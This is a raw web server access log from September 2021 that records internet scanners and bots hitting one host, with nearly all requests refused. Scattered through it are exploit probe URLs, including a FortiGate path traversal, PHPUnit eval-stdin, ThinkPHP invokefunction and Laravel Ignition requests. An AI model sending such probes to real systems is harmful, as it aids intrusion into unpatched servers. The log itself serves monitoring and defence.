GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:01:19:01 +0000] 400 - - http localhost "-" [Client 87.251.67.156] [Length 154] [Gzip -] "-" "-" [06/Sep/2021:02:02:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:04:18:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [06/Sep/2021:04:20:20 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.161] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [06/Sep/2021:05:00:31 +0000] 444 - GET https 139.162.113.11 "/" [Client 31.192.237.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.7.1) Gecko/20100101 Firefox/52.7.1" "-" [06/Sep/2021:05:50:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [06/Sep/2021:06:26:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.214.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:06:39:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 54.176.125.238] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [06/Sep/2021:07:00:42 +0000] 444 - GET https localhost "/" [Client 123.160.221.21] [Length 0] [Gzip -] "curl/7.64.1" "-" [06/Sep/2021:07:03:04 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 111.7.100.16] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [06/Sep/2021:07:03:05 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/" [Client 111.7.100.16] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [06/Sep/2021:07:19:09 +0000] 400 - GET https localhost "/" [Client 143.198.136.88] [Length 154] [Gzip -] "-" "-" [06/Sep/2021:07:19:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.198.136.88] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [06/Sep/2021:10:18:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [06/Sep/2021:10:24:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:10:32:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.128] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:10:50:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.102.56.18] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [06/Sep/2021:10:50:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.141] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [06/Sep/2021:11:19:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:11:30:42 +0000] 444 - GET https smtp.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [06/Sep/2021:12:10:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.172] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:12:47:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:13:14:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:41 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:42 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:44 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:44 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:46 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:47 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [06/Sep/2021:13:14:47 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:48 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:14:49 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [06/Sep/2021:13:31:34 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [06/Sep/2021:13:38:05 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 45.227.254.31] [Length 0] [Gzip -] "Python-urllib/3.9" "-" [06/Sep/2021:15:23:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.53.170.243] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:16:33:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.90] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:17:01:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [06/Sep/2021:18:06:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:18:08:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [06/Sep/2021:18:09:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [06/Sep/2021:18:35:31 +0000] 400 - POST http 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 217.112.83.246] [Length 252] [Gzip -] "python-requests/2.18.4" "-" [06/Sep/2021:19:44:51 +0000] 444 - GET https agent.moralanimal.net "/" [Client 64.225.21.193] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [06/Sep/2021:23:01:42 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.217.57] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [06/Sep/2021:23:30:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [06/Sep/2021:23:32:19 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.4] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:00:33:48 +0000] 400 - - http localhost "-" [Client 87.251.67.156] [Length 154] [Gzip -] "-" "-" [07/Sep/2021:00:58:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.113] [Length 0] [Gzip -] "-" "-" [07/Sep/2021:00:58:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.113] [Length 252] [Gzip -] "-" "-" [07/Sep/2021:00:58:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Sep/2021:02:08:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [07/Sep/2021:02:53:41 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:43 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:45 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:46 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:47 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [07/Sep/2021:02:53:49 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:49 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:52 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:02:53:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:05:18:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 91.241.19.243] [Length 0] [Gzip -] "curl/7.55.0" "-" [07/Sep/2021:05:23:56 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 144.86.173.144] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [07/Sep/2021:06:26:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.211.103] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:07:38:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [07/Sep/2021:11:03:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Sep/2021:11:17:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.62.237.202] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [07/Sep/2021:11:17:27 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 178.62.237.202] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [07/Sep/2021:11:17:30 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 178.62.237.202] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" [07/Sep/2021:12:12:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.211.204] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [07/Sep/2021:12:27:09 +0000] 444 - GET https pop.moralanimal.net "/" [Client 61.135.15.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; OPPO x22 6.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4472.114 Mobile Safari/537.36" "-" [07/Sep/2021:12:43:31 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 144.86.173.132] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [07/Sep/2021:13:43:33 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [07/Sep/2021:14:09:14 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Sep/2021:14:09:15 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [07/Sep/2021:14:34:55 +0000] 444 - GET https 64.22.31.253 "/search?q=landblink&cp=0&hl=en-US&pq=%landblink%&sourceid=chrome&ie=UTF-8" [Client 34.102.115.225] [Length 0] [Gzip -] "-" "-" [07/Sep/2021:14:36:14 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 144.86.173.3] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [07/Sep/2021:16:37:30 +0000] 400 - GET http localhost "/recordings/theme/main.css" [Client 77.247.108.42] [Length 154] [Gzip -] "gbrmss/7.29.0" "-" [07/Sep/2021:17:00:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Sep/2021:17:01:49 +0000] 400 - - http localhost "-" [Client 91.220.163.62] [Length 154] [Gzip -] "-" "-" [07/Sep/2021:17:15:18 +0000] 444 - GET https help.moralanimal.net "/" [Client 144.86.173.19] [Length 0] [Gzip -] "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" "-" [07/Sep/2021:17:41:54 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.162] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.41.1.el7.x86_64" "-" [07/Sep/2021:17:55:27 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 167.71.107.116] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:17:57:10 +0000] 444 - GET https io.moralanimal.net "/" [Client 165.227.118.36] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:18:31:58 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 159.89.186.38] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:18:40:29 +0000] 444 - GET https home.moralanimal.net "/" [Client 167.71.168.251] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:18:42:24 +0000] 444 - GET https sql.moralanimal.net "/" [Client 157.245.217.91] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:18:54:50 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 64.225.56.138] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:19:14:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [07/Sep/2021:19:32:36 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 159.65.255.185] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:19:41:01 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 161.35.129.214] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:19:48:49 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 138.197.72.59] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:19:49:50 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 165.22.42.97] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:20:05:07 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 161.35.186.178] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:20:17:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.44] [Length 0] [Gzip -] "-" "-" [07/Sep/2021:20:17:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "-" "-" [07/Sep/2021:20:17:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [07/Sep/2021:20:17:58 +0000] 444 - GET https traefik.moralanimal.net "/" [Client 159.65.165.105] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:20:20:45 +0000] 444 - GET https opds.moralanimal.net "/" [Client 164.90.142.76] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:21:08:05 +0000] 444 - GET https router.moralanimal.net "/" [Client 167.71.171.168] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:21:13:25 +0000] 444 - GET https komga.moralanimal.net "/" [Client 138.197.7.104] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)" "-" [07/Sep/2021:21:37:44 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:44 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:47 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:49 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:51 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:53 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [07/Sep/2021:21:37:54 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [07/Sep/2021:21:37:55 